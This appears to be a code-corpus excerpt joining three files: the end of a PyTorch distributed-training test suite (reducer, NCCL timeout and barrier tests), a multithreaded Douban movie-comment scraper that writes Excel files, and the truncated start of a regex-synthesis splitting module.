torch.manual_seed(31415)
l1 = nn.Linear(2000, 2000)
l2 = nn.Linear(2000, 2000)
l1.weight = l2.weight
model = nn.Sequential(l1, l2).cuda()
model = nn.parallel.DistributedDataParallel(model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group)
input_tensor = torch.rand((64, 2000), device="cuda", requires_grad=True)
output_tensor = checkpoint(model, input_tensor)
output_tensor.sum().backward()
norm = 0.0
for p in model.parameters():
self.assertTrue(p.grad is not None)
norm += p.grad.norm().item()
assert numpy.allclose(norm, 57004), norm
class ReducerModule(nn.Module):
def __init__(self):
super(ReducerModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, use_fc3=True):
x = self.relu(self.fc1(x)).float()
x = self.relu(self.fc2(x)).float()
if use_fc3:
x = self.fc3(x).float()
return F.softmax(x, dim=1)
@requires_gloo()
class ReducerTest(TestCase):
def setUp(self):
self.file = tempfile.NamedTemporaryFile(delete=False)
self.store = c10d.FileStore(self.file.name, 1)
self.process_group = c10d.ProcessGroupGloo(self.store, 0, 1)
def test_single_dtype_single_bucket(self):
model = ReducerModule()
parameters = list(model.parameters())
buckets = [list(range(len(parameters)))]
dist.Reducer([parameters], buckets, self.process_group)
def _create_mixed_precision_model(self):
model = ReducerModule()
model.float()
model.fc1.double()
return model
def test_multi_dtype_single_bucket(self):
model = self._create_mixed_precision_model()
# Raise if there are multiple types per bucket.
# In this case we create one bucket for all parameters.
with self.assertRaises(RuntimeError):
parameters = [list(model.parameters())]
buckets = [list(range(len(parameters[0])))]
dist.Reducer(parameters, buckets, self.process_group)
def test_multi_dtype_multi_bucket(self):
model = self._create_mixed_precision_model()
parameters = [list(model.parameters())]
group_by_dtype = groupby(
range(len(parameters[0])), key=lambda i: parameters[0][i].dtype
)
buckets = [list(indices) for _, indices in group_by_dtype]
dist.Reducer(parameters, buckets, self.process_group)
def _create_reducer_for_models(self, models, find_unused_parameters=False):
parameters = [list(model.parameters()) for model in models]
group_by_dtype = groupby(
range(len(parameters[0])), key=lambda i: parameters[0][i].dtype
)
buckets = [list(indices) for _, indices in group_by_dtype]
return dist.Reducer(
parameters,
buckets,
self.process_group,
find_unused_parameters=find_unused_parameters,
)
def test_forward_backward_single_replica(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model])
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
output = loss(model(input), target)
reducer.prepare_for_backward(output)
output.backward()
def test_forward_backward_multi_replica(self):
batch_size = 10
num_replicas = 2
models = [self._create_mixed_precision_model() for _ in range(num_replicas)]
reducer = self._create_reducer_for_models(models)
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.double).chunk(num_replicas)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
outputs = [models[i](input[i]) for i in range(num_replicas)]
output = loss(torch.cat(outputs), target)
reducer.prepare_for_backward(output)
output.backward()
# The reducer will have reduced the gradients for all model replicas.
# Verify that they are equal across model replicas.
for parameters in zip(*[model.parameters() for model in models]):
for parameter in parameters:
self.assertEqual(parameters[0].grad, parameter.grad)
def test_forward_backward_unused_parameters(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model], find_unused_parameters=True)
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
output = loss(model(input, use_fc3=False), target)
# Check that the grad of fc3 is not set.
self.assertEqual(None, model.fc3.weight.grad)
# Compute and accumulate gradients.
reducer.prepare_for_backward(output)
output.backward()
# The reducer will have marked the grad of fc3 as ready, because
# it doesn't show up in the autograd graph of `output`. Since fc3.weight
# is considered being globally unused, it will be kept untouched as None.
self.assertEqual(None, model.fc3.weight.grad)
def test_forward_backward_optimizer(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model], find_unused_parameters=True)
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters())
for i in range(3):
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# The `zero_grad` function calls `detach_` and `zero_` on the grad
# tensors of model parameters. If we tried to set the grad tensors
# to a view of the reducer's bucket tensors, this would blow up.
optimizer.zero_grad()
# Unused parameter only in the first iteration.
output = loss(model(input, use_fc3=(i > 0)), target)
reducer.prepare_for_backward(output)
output.backward()
optimizer.step()
def test_ddp_comm_hook_multiple_replica_check(self):
"""
DDP communication hook does not support single process multiple device mode.
This unit test validates this condition is properly checked by reducer.
Related to GH Issue #42542.
"""
num_replicas = 2
models = [self._create_mixed_precision_model() for _ in range(num_replicas)]
reducer = self._create_reducer_for_models(models)
def dummy_hook(state, bucket):
fut = torch.futures.Future()
fut.set_result(bucket.get_tensors())
return fut
with self.assertRaisesRegex(
RuntimeError,
"Communication hook does not support single-process multiple-device mode.",
):
dist._register_comm_hook(reducer, None, dummy_hook)
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result = dist._compute_bucket_assignment_by_size(tensors, [400])
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result = dist._compute_bucket_assignment_by_size(tensors, [400])
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result = dist._compute_bucket_assignment_by_size(tensors, [40, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result = dist._compute_bucket_assignment_by_size(tensors, [200, 400])
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._fork_processes()
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d runs with async error handling by default, but this
# tests behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get("NCCL_ASYNC_ERROR_HANDLING", None)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
# This allreduce does not block Python thread as allreduce enqueues
# the cuda operation, and then wait only blocks the current cuda
# stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait()
# Run some GPU operations to make sure cuda has not gotten stuck.
# It was observed cuda could get stuck if NCCL communicators were
# not properly aborted before throwing RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
# Clean up structures (ex: files for FileStore before going down)
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_blocking_clean_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.barrier().wait()
if self.rank == 0:
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait()
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
timeout = 1
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=timeout)
)
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
if self.rank == 0:
# This should timeout in about 1 second.
start = time.time()
# Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
else:
# Sleep to ensure timeout.
time.sleep(2 * timeout)
self._wait_for_comm_abort(process_group)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class CommTest(MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are idential to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_gloo_cuda(self):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
device = torch.device("cuda:%d" % self.rank)
ranks = list(range(self.world_size))
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
def test_broadcast_coalesced_gloo_cpu(self):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
device = torch.device("cpu")
ranks = list(range(self.world_size))
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
def test_pass_gloo_options(self):
pg_opts = c10d.ProcessGroupGloo.Options()
pg_opts.timeout = timedelta(seconds=10)
pg_opts._devices = [create_device(interface=LOOPBACK)]
pg_opts._threads = 2
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
"gloo",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts
)
default_pg = c10d.distributed_c10d._get_default_group()
# Test properly set devices on options if user don't set devices
no_device_thread_pg_opts = c10d.ProcessGroupGloo.Options(timeout=timedelta(seconds=10))
no_device_thread_pg = dist.new_group([0, 1], pg_options=no_device_thread_pg_opts)
self.assertTrue(len(no_device_thread_pg.options._devices) != 0)
# ensure created pg have the correct timeout set instead of default time out
self.assertEqual(no_device_thread_pg.options.timeout, timedelta(seconds=10))
# Test if user pass in Options, set threads, but not set devices, should error out
no_device_pg_opts = c10d.ProcessGroupGloo.Options(timeout=timedelta(seconds=10))
no_device_pg_opts._threads = 4
with self.assertRaisesRegex(
RuntimeError, "threads and devices must be passed in together"
):
no_device_pg = dist.new_group([0, 1], pg_options=no_device_pg_opts)
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
@requires_gloo()
def test_pass_gloo_options_and_timeout(self):
pg_opts = c10d.ProcessGroupGloo.Options()
pg_opts.timeout = timedelta(seconds=10)
store = c10d.FileStore(self.file_name, self.world_size)
# Test timeout and pg_options both set, should error out
with self.assertRaisesRegex(
RuntimeError, "timeout value defined in pg_options are conflicting"
):
dist.init_process_group(
"gloo",
world_size=self.world_size,
rank=self.rank,
store=store,
timeout=timedelta(20),
pg_options=pg_opts
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# test if the process group constructed with high priority stream
self.assertTrue(pg.options.is_high_priority_stream)
# test the process group works as expected
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
@requires_gloo()
def test_gloo_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="gloo", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "device_ids not supported"):
c10d.barrier(device_ids=[self.rank])
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
crawler.py
|
# -*- codeing = utf-8 -*-
from bs4 import BeautifulSoup # 网页解析,获取数据
import re # 正则表达式,进行文字匹配`
import urllib.request, urllib.error # 制定URL,获取网页数据
import xlwt # 进行excel操作
import time
import random
import re
import time
import requests
import threading
from lxml import html
etree=html.etree
from bs4 import BeautifulSoup
from queue import Queue
from threading import Thread
import pandas as pd
findcomment = re.compile(r'<span class="short">(.*)</span>')
findtime=re.compile(r'<span class="comment-time" title="(.*)"')
findstar_list=re.compile(r'<span class="(.*)" title="(.*)"></span>')
findTitle = re.compile(r'<p class="pl2">> <a href="(.*)">去 (.*) 的页面</a></p>')
io = 'D:\\Top250.xls'
df = pd.read_excel(io)
def askURL(url):
pc_agent = [
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0);",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"
"Mozilla/5.0 (X11; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
]
agent = random.choice(pc_agent)
head = {'User-Agent': agent}
# 用户代理,表示告诉豆瓣服务器,我们是什么类型的机器、浏览器(本质上是告诉浏览器,我们可以接收什么水平的文件内容)
request = urllib.request.Request(url, headers=head)
html = ""
try:
response = urllib.request.urlopen(request)
html = response.read().decode("utf-8")
except urllib.error.URLError as e:
if hasattr(e, "code"):
print(e.code)
if hasattr(e, "reason"):
print(e.reason)
return html
def run(q): ##q="id"
while q.empty() is not True:
datalist2 = []
qq=q.get()
j=0
for i in range(0, 20):
time.sleep(1)
url = "https://movie.douban.com/subject/" + str(qq) + "/comments?start=" + str(
i * 20) + "&limit=20&status=P&sort=new_score"
print(url)
html = askURL(url)
soup = BeautifulSoup(html, "html.parser")
# for item in soup.find_all('p', class_="pl2"): # 查找符合要求的字符串
# j = j + 1
# #print(item)
# if j==1:
# #print(re.findall(r"\"keywords\">\n<meta content=\"(.+?)短评"))
# title = (re.findall(findTitle[1], str(item)))[0]
# print(title)
for item in soup.find_all('div', class_="comment"): # 查找符合要求的字符串
data = [] # 保存一部电影所有信息
comment = re.findall(findcomment, str(item))
comment_time = re.findall(findtime, str(item))
comment_star = re.findall(findstar_list, str(item))
if len(comment_star) == 0:
num1 = 0.0
else:
star = comment_star[0][0]
num = int(star[7:9])
num1 = num / 5
data.append(comment)
data.append(comment_time)
data.append(num1)
datalist2.append(data)
book = xlwt.Workbook(encoding="utf-8", style_compression=0) # 创建workbook对象
sheet = book.add_sheet('豆瓣电影Top1comment', cell_overwrite_ok=True) # 创建工作表
col = ("评论", "时间", "评分")
i = 0
sheet.write(0, 0, col[0])
sheet.write(0, 1, col[1])
sheet.write(0, 2, col[2])
for item in datalist2:
data = item
sheet.write(i + 1, 0, data[0])
sheet.write(i + 1, 1, data[1])
sheet.write(i + 1, 2, data[2])
i = i + 1
a = df[df['id'].isin([int(qq)])].index.values[0]
savepath2 = "豆瓣电影Top" +str(a+1) + "comment.xls"
print(savepath2)
book.save(savepath2)
q.task_done()
def main():
queue=Queue()
# io='D:\\Top250.xls'
# df = pd.read_excel(io)
df_li=df.values.tolist()
result=[]
for s_li in df_li:
result.append(s_li[8])
for i in result:
queue.put(str(i))
for i in range(10):
thread = Thread(target=run, args=(queue,))
thread.daemon = True # 随主线程退出而退出
thread.start()
queue.join() # 队列消费完 线程结束
if __name__ == "__main__": # 当程序执行时
# 调用函数
main()
|
split.py
|
import torch
import os, sys
from multiprocessing import Process, Manager
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'submodels', 'SoftConciseNormalForm')))
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'submodels', 'RegexGenerator')))
from collections import Counter
from submodels.RegexGenerator.batch import *
import submodels.SCNF.synthesizer
from submodels.SCNF.parsetree import *
import submodels.SCNF.synthesizer_snort
from submodels.SCNF.util_snort import *
from seq2seq.dataset.dataset import Vocabulary
from submodels.SCNF.examples import Examples
from rpni import synthesis as rpni_synthesis
class Ex():
def __init__(self, pos, neg):
self.pos = pos
self.neg = neg
def is_last_sigma(lst, split_size):
try:
idx = len(lst) - 1 - list(reversed(lst)).index(split_size)
except:
return False
if idx != 9 and lst[idx+1] == 0:
return True
def split(strings, label, no_split=False):
vocab = Vocabulary()
splited_string = []
if no_split:
for batch_idx in range(len(strings)):
set = []
for set_idx in range(10):
seq = []
seq.append(''.join(map(lambda x: vocab.itos[x], strings[batch_idx, set_idx][
strings[batch_idx, set_idx] != strings.max()].tolist())))
set.append(seq)
splited_string.append(set)
return splited_string, None
label = [i.tolist() for i in label]
tmp = torch.LongTensor(label).transpose(0, 1).squeeze(-1).tolist()
split_size = torch.tensor(label)[torch.tensor(label) != vocab.stoi['<pad>']].max().item()
if any(map(lambda x:is_last_sigma(x, split_size),tmp)):
split_size += 1
label2 = []
sigma_lst = []
for templete in tmp:
tmp2 = []
sigma_lst2 = []
now = 0
for element in templete:
if element != 0:
if now != element and element != vocab.stoi['<pad>']:
for _ in range(element - len(sigma_lst2)):
sigma_lst2.append(False)
tmp2.append(element)
now = element
else:
if not sigma_lst2 or not sigma_lst2[-1]:
sigma_lst2.append(True)
tmp2.append(now + 1)
